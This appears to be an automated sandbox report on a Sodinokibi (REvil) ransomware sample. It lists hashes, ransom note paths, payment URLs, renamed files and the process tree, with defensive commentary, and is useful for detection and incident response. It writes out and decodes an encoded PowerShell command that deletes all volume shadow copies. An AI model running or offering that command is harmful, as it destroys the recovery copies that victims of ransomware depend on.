Analysis
max time kernel: 103s
max time network: 115s
platform: windows7_x64
resource: win7
submitted: 30-07-2020 16:07

Static task: static1
Behavioral task: behavioral1
  Sample: lg.bin.exe
  Resource: win7
Behavioral task: behavioral2
  Sample: lg.bin.exe
  Resource: win10
General
Target: lg.bin.exe
Size: 290KB
MD5: 5f58902825d15d59528f98faf43b86c3
SHA1: f09e5e72b433d11a32efe2e5d63db0bc7b8def59
SHA256: 140f831ddd180861481c9531aa6859c56503e77d29d00439c1e71c5b93e01e1a
SHA512: 5aae01c51f026e7382bf20117e81cc06a975f561370e7f9170b02bc83e329cc1737d82cf721f3901cf4c2c9180423bdaf6a375a109d05e9ca164c7c08970a3c6
Malware Config
Extracted
Ransom note path: C:\m6x73942b6-readme.txt
Family: sodinokibi
URLs from the ransom note (the same victim identifier, 0BDB1394373EB709, is used on the Tor site and on the clearnet mirror):
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0BDB1394373EB709
  http://decryptor.cc/0BDB1394373EB709
Signatures

Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes: lg.bin.exe, powershell.exe
pid | process
1768 | lg.bin.exe
1836 | powershell.exe
1836 | powershell.exe
Drops file in Program Files directory (26 IoCs)
Processes: lg.bin.exe
description | ioc | process
File opened for modification | \??\c:\program files\RepairTest.TTS | lg.bin.exe
File opened for modification | \??\c:\program files\ResetDeny.vstm | lg.bin.exe
File opened for modification | \??\c:\program files\SearchGet.docx | lg.bin.exe
File opened for modification | \??\c:\program files\UnblockDismount.mp4v | lg.bin.exe
File opened for modification | \??\c:\program files\FormatMove.tiff | lg.bin.exe
File opened for modification | \??\c:\program files\LimitGet.mov | lg.bin.exe
File opened for modification | \??\c:\program files\PopUnlock.wmv | lg.bin.exe
File opened for modification | \??\c:\program files\RepairInitialize.htm | lg.bin.exe
File opened for modification | \??\c:\program files\SkipFormat.svgz | lg.bin.exe
File opened for modification | \??\c:\program files\WriteGrant.midi | lg.bin.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\m6x73942b6-readme.txt | lg.bin.exe
File opened for modification | \??\c:\program files\CheckpointConfirm.vssm | lg.bin.exe
File opened for modification | \??\c:\program files\CopyUnlock.xla | lg.bin.exe
File opened for modification | \??\c:\program files\DisconnectOut.raw | lg.bin.exe
File opened for modification | \??\c:\program files\InitializeRestart.mov | lg.bin.exe
File opened for modification | \??\c:\program files\ResetResolve.tif | lg.bin.exe
File opened for modification | \??\c:\program files\RestoreCompress.txt | lg.bin.exe
File created | \??\c:\program files (x86)\m6x73942b6-readme.txt | lg.bin.exe
File opened for modification | \??\c:\program files\BackupUnpublish.m4v | lg.bin.exe
File created | \??\c:\program files\microsoft sql server compact edition\m6x73942b6-readme.txt | lg.bin.exe
File opened for modification | \??\c:\program files\RemoveRename.nfo | lg.bin.exe
File opened for modification | \??\c:\program files\SaveDisconnect.rle | lg.bin.exe
File opened for modification | \??\c:\program files\SendMove.mp4 | lg.bin.exe
File opened for modification | \??\c:\program files\ShowSearch.mhtml | lg.bin.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\m6x73942b6-readme.txt | lg.bin.exe
File created | \??\c:\program files\m6x73942b6-readme.txt | lg.bin.exe
Modifies extensions of user files (1 IoC)
Ransomware generally changes the extension on encrypted files.
Processes: lg.bin.exe
description | ioc | process
File renamed | C:\Users\Admin\Pictures\LimitShow.tif => \??\c:\users\admin\pictures\LimitShow.tif.m6x73942b6 | lg.bin.exe
The appended extension (.m6x73942b6) is the same token that names the ransom note (m6x73942b6-readme.txt) dropped into every directory above, so a single file-rename event already gives the note filename to hunt for on other hosts.
Enumerates connected drives (3 TTPs)
Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes: lg.bin.exe, powershell.exe, vssvc.exe
description | pid | process
Token: SeDebugPrivilege | 1768 | lg.bin.exe
Token: SeDebugPrivilege | 1836 | powershell.exe
Token: SeBackupPrivilege | 2040 | vssvc.exe
Token: SeRestorePrivilege | 2040 | vssvc.exe
Token: SeAuditPrivilege | 2040 | vssvc.exe
Token: SeTakeOwnershipPrivilege | 1768 | lg.bin.exe
SeTakeOwnershipPrivilege in lg.bin.exe fits the Program Files writes above: with it the sample can take ownership of files its token could not otherwise open for modification. The backup, restore and audit privileges on vssvc.exe are the shadow-copy service's own, enabled while it services the deletion request issued from PowerShell; they are not privileges the sample obtained.
Suspicious use of WriteProcessMemory (4 IoCs)
Processes: lg.bin.exe
description | pid | process | target process
PID 1768 wrote to memory of 1836 | 1768 | lg.bin.exe | powershell.exe
PID 1768 wrote to memory of 1836 | 1768 | lg.bin.exe | powershell.exe
PID 1768 wrote to memory of 1836 | 1768 | lg.bin.exe | powershell.exe
PID 1768 wrote to memory of 1836 | 1768 | lg.bin.exe | powershell.exe
All four writes target the PowerShell child the sample has just spawned. On their own they are consistent with ordinary process creation, where the parent writes the child's startup data, rather than injection of foreign code; nothing else in this report shows code being placed into another process.
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: lg.bin.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\v1lw78yfwa0g.bmp" | lg.bin.exe
The value is written under the user's SID in HKEY_USERS, i.e. the current user's HKCU hive, and points at a randomly named bitmap dropped in the user's Temp directory.
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Modifies service (2 TTPs, 5 IoCs)
Processes: vssvc.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Note the process column: these per-writer diagnostic keys under Services\VSS\Diag are created by vssvc.exe itself while it handles a shadow-copy request. They are a side effect of the Delete() call issued from PowerShell, not the sample rewriting service configuration.
Processes

C:\Users\Admin\AppData\Local\Temp\lg.bin.exe (tree depth 1, PID 1768)
Command line: "C:\Users\Admin\AppData\Local\Temp\lg.bin.exe"
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
- Modifies extensions of user files
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Sets desktop wallpaper using registry

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 2, child of PID 1768, PID 1836)
  Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  Decoded -e argument (base64 of UTF-16LE text): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
  This deletes every Volume Shadow Copy through WMI so that the encrypted files cannot be restored from previous versions. It explains the rest of the tree: the WMI call brings up the callback host unsecapp.exe, and the deletion is carried out by the shadow-copy service vssvc.exe, which is what acquires the backup and restore privileges listed under the signatures.
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\wbem\unsecapp.exe (tree depth 1, PID 1880)
Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
Legitimate Windows component (the WMI client callback sink), started by DCOM because of the Get-WmiObject call above, not spawned by the sample directly.

C:\Windows\system32\vssvc.exe (tree depth 1, PID 2040)
Command line: C:\Windows\system32\vssvc.exe
- Suspicious use of AdjustPrivilegeToken
- Modifies service